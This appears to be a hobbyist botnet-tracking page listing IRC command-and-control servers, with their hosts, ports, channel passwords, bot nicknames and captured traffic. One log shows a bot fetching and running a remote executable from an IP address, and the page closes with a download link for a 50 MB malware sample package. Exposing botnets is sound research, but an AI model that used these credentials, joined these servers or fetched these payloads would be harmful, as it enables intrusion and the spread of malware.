70.107.249.167:3921 Nick: A4-647337362958 Username: fpairedpyoqaak Joined Channel: #mss2 with Password mss2pass Channel Topic for Channel #mss2: “xvvv mssql 100 0 0 -a -r -s” i got this info from Seb another botnet lover lol hosting infos: http://whois.domaintools.com/70.107.249.167
smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)
This botnet is very big one and the bot used for spreading is also special alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc Sample vas captured by Xylitol and then i helped for finding more ip’s and diferent samplesRead more...
main.xxxxxiseviumixxxxx.info(irc botnet hosted in Germany Berlin Active Media)
Remote Host Port Number jky.no-ip.info 3177 RAT here main.xxxxxiseviumixxxxx.info 3211 IRCD here NICK Sapphire{USA|XP-SP2}0300311 USER 03003114 “” “03003114” :03003114 MODE Sapphire{USA|XP-SP2}0300311 JOIN #Sapphire_2# NICK New{USA|XP-SP2}1046453 USER 10464537 “” “10464537” :10464537 MODE New{USA|XP-SP2}1046453 hosting infos: http://whois.domaintools.com/88.198.219.113
95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host Port Number 95.173.179.231 6667 PASS codr00t MODE [USA|XP|094124] -ix JOIN #k codr00t PRIVMSG #k :[p2p]: Spreading to p2p folders. PONG HTTP1.4 NICK [USA|XP|094124] USER xfgbxix * 0 :COMPUTERNAME hosting infos: http://whois.domaintools.com/95.173.179.231
01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number 01.cybernix.info 1750 PASS gsaxx00 NICK 0USA9j6m6dbn0n USER XP-SP2 x x :COMPUTERNAME JOIN ##pool P00L NICK 0USAiky784di69 hosting infos: http://whois.domaintools.com/154.35.64.32
46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number ircserver.taylor412gang.com 3941 NICK N[USA|XP][qhfpagj] USER qhfp “” “lol” :qhfp JOIN #apple apple57 hosting infos: http://whois.domaintools.com/46.243.8.119
ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)
Remote Host Port Number 209.200.50.75 3800 PASS hax0r 213.251.170.52 80 91.200.241.40 80 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://91.200.241.40/dq.exe PRIVMSG #dpi :[d=”http://91.200.241.40/dq.exe” s=”23552 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PASS hax0r..KCIK 00000010 | 206E 7B55 537C 5850Read more...
homelessman.weedns.com(Mouse’s botnet hosted in the whole world lol)
this is prob one of the bigest botnets still alive from years now dns:homelessman.weedns.com port:3305 Resolved : [homelessman.weedns.com] To [80.247.72.130] Resolved : [homelessman.weedns.com] To [92.62.231.115] Resolved : [homelessman.weedns.com] To [202.117.53.21] Resolved : [homelessman.weedns.com] To [156.26.121.177] DNS List: ns.yumetairiku.co.jp:3305 virtual-mgsf.nebula.fi:3305 dell.aurius.sk:3305 cx10man.weedns.com:3305 fx010413.whyI.org:3305 gynoman.weedns.com:3305 c010x1.co.cc:3305 commgr.co.cc:3305 g.0x20.biz:3305 telephone.dd.blueline.be:3305 cx10man.weedns.com:3305 gynoman.weedns.com:3305 www.carpet-backing.com www.comofil.it www.iris-spa.it www.osteriadeltorchio.it ballslessman.weedns.com:3305 fx010413.whyi.org:3305Read more...
toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number toxfeenyxx.sdeirc.net 3674 NICK N[USA|XP][tjxcvay] USER tjxc “” “lol” :tjxc JOIN #phoenix selling9309239 NICK N[USA|XP][baersyl] USER baer “” “lol” :baer hosting infos: http://whois.domaintools.com/46.243.8.142
50mb malware samples
This is another package with diferent malwares have fun size=50mb Download: http://c65cdb0b.tubeviral.com